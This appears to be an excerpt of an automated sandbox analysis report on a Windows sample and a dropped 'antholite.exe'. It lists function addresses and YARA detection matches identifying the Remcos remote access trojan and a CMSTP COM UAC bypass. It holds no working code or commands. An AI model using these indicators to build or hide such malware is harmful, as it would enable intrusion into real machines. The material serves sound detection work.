                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_008FE8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,3_2_008FE8F6
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_007080600_2_00708060
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_007720460_2_00772046
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_007682980_2_00768298
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_0073E4FF0_2_0073E4FF
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_0073676B0_2_0073676B
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_007948730_2_00794873
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_0070CAF00_2_0070CAF0
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_0072CAA00_2_0072CAA0
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_0071CC390_2_0071CC39
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_00736DD90_2_00736DD9
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_0071B1190_2_0071B119
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_007091C00_2_007091C0
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_007213940_2_00721394
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_007217060_2_00721706
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_0072781B0_2_0072781B
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_0071997D0_2_0071997D
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_007079200_2_00707920
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_007219B00_2_007219B0
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_00727A4A0_2_00727A4A
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_00721C770_2_00721C77
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_00727CA70_2_00727CA7
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_0078BE440_2_0078BE44
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_00739EEE0_2_00739EEE
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_0070BF400_2_0070BF40
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_00721F320_2_00721F32
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_025336100_2_02533610
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_0043706A2_2_0043706A
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_004140052_2_00414005
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_0043E11C2_2_0043E11C
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_004541D92_2_004541D9
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_004381E82_2_004381E8
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_0041F18B2_2_0041F18B
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_004462702_2_00446270
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_0043E34B2_2_0043E34B
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_004533AB2_2_004533AB
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_0042742E2_2_0042742E
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_004375662_2_00437566
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_0043E5A82_2_0043E5A8
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_004387F02_2_004387F0
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_0043797E2_2_0043797E
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_004339D72_2_004339D7
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_0044DA492_2_0044DA49
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_00427AD72_2_00427AD7
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_0041DBF32_2_0041DBF3
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_00427C402_2_00427C40
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_00437DB32_2_00437DB3
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_00435EEB2_2_00435EEB
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_0043DEED2_2_0043DEED
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_00426E9F2_2_00426E9F
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_009020462_2_00902046
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_008980602_2_00898060
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_008F82982_2_008F8298
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_008CE4FF2_2_008CE4FF
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_008C676B2_2_008C676B
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_009248732_2_00924873
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_008BCAA02_2_008BCAA0
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_0089CAF02_2_0089CAF0
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_008ACC392_2_008ACC39
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_008C6DD92_2_008C6DD9
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_008991C02_2_008991C0
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_008AB1192_2_008AB119
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_008B13942_2_008B1394
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_008B17062_2_008B1706
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_008B781B2_2_008B781B
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_008B19B02_2_008B19B0
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_008979202_2_00897920
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_008A997D2_2_008A997D
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_008B7A4A2_2_008B7A4A
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_008B7CA72_2_008B7CA7
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_008B1C772_2_008B1C77
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_008C9EEE2_2_008C9EEE
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_0091BE442_2_0091BE44
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_008B1F322_2_008B1F32
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_100171942_2_10017194
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_1000B5C12_2_1000B5C1
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_010F36102_2_010F3610
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_0044B0403_2_0044B040
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_0043610D3_2_0043610D
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_004473103_2_00447310
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_0044A4903_2_0044A490
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_0040755A3_2_0040755A
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_0043C5603_2_0043C560
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_0044B6103_2_0044B610
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_0044D6C03_2_0044D6C0
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_004476F03_2_004476F0
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_0044B8703_2_0044B870
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_0044081D3_2_0044081D
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_004149573_2_00414957
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_004079EE3_2_004079EE
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_00407AEB3_2_00407AEB
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_0044AA803_2_0044AA80
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_00412AA93_2_00412AA9
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_00404B743_2_00404B74
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_00404B033_2_00404B03
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_0044BBD83_2_0044BBD8
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_00404BE53_2_00404BE5
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_00404C763_2_00404C76
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_00415CFE3_2_00415CFE
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_00416D723_2_00416D72
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_00446D303_2_00446D30
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_00446D8B3_2_00446D8B
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_00406E8F3_2_00406E8F
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_009020463_2_00902046
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_008980603_2_00898060
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_008F82983_2_008F8298
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_008CE4FF3_2_008CE4FF
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_008C676B3_2_008C676B
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_009248733_2_00924873
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_008BCAA03_2_008BCAA0
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_0089CAF03_2_0089CAF0
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_008ACC393_2_008ACC39
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_008C6DD93_2_008C6DD9
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_008AAFAC3_2_008AAFAC
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_008991C03_2_008991C0
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_008B13943_2_008B1394
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_008B17063_2_008B1706
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_008B781B3_2_008B781B
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_008B19B03_2_008B19B0
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_008979203_2_00897920
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_008A997D3_2_008A997D
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_008B7A4A3_2_008B7A4A
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_008B7CA73_2_008B7CA7
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_008B1C773_2_008B1C77
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_008C9EEE3_2_008C9EEE
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_0091BE443_2_0091BE44
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_008B1F323_2_008B1F32
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: String function: 0071F9F2 appears 40 times
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: String function: 00720A30 appears 46 times
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: String function: 00709CB3 appears 31 times
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: String function: 008C2FA6 appears 48 times
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: String function: 00402093 appears 50 times
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: String function: 008B0A30 appears 92 times
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: String function: 008B4963 appears 62 times
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: String function: 004169A7 appears 87 times
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: String function: 008B4A28 appears 42 times
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: String function: 008B8E0B appears 36 times
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: String function: 0044DB70 appears 41 times
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: String function: 004165FF appears 35 times
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: String function: 00899CB3 appears 62 times
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: String function: 00434801 appears 41 times
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: String function: 008AF9F2 appears 81 times
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: String function: 008D1F50 appears 53 times
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: String function: 00401E65 appears 35 times
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: String function: 0089988F appears 33 times
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: String function: 0089600E appears 34 times
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: String function: 00434E70 appears 54 times
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: String function: 00416760 appears 69 times
                  Source: Rgh99876k7e.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  Source: 2.2.antholite.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 2.2.antholite.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 2.2.antholite.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 7.2.antholite.exe.3c00000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 7.2.antholite.exe.3c00000.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 7.2.antholite.exe.3c00000.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 7.2.antholite.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 7.2.antholite.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 7.2.antholite.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 7.2.antholite.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 7.2.antholite.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 7.2.antholite.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 2.2.antholite.exe.34e0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 2.2.antholite.exe.34e0000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 2.2.antholite.exe.34e0000.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 7.2.antholite.exe.3c00000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 7.2.antholite.exe.3c00000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 7.2.antholite.exe.3c00000.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 2.2.antholite.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 2.2.antholite.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 2.2.antholite.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 2.2.antholite.exe.34e0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 2.2.antholite.exe.34e0000.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 2.2.antholite.exe.34e0000.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 00000002.00000002.4549770141.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 00000002.00000002.4549770141.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 00000002.00000002.4549770141.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 00000002.00000002.4551036697.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 00000002.00000002.4551036697.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 00000002.00000002.4551036697.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 00000007.00000002.2233641554.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 00000007.00000002.2233641554.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
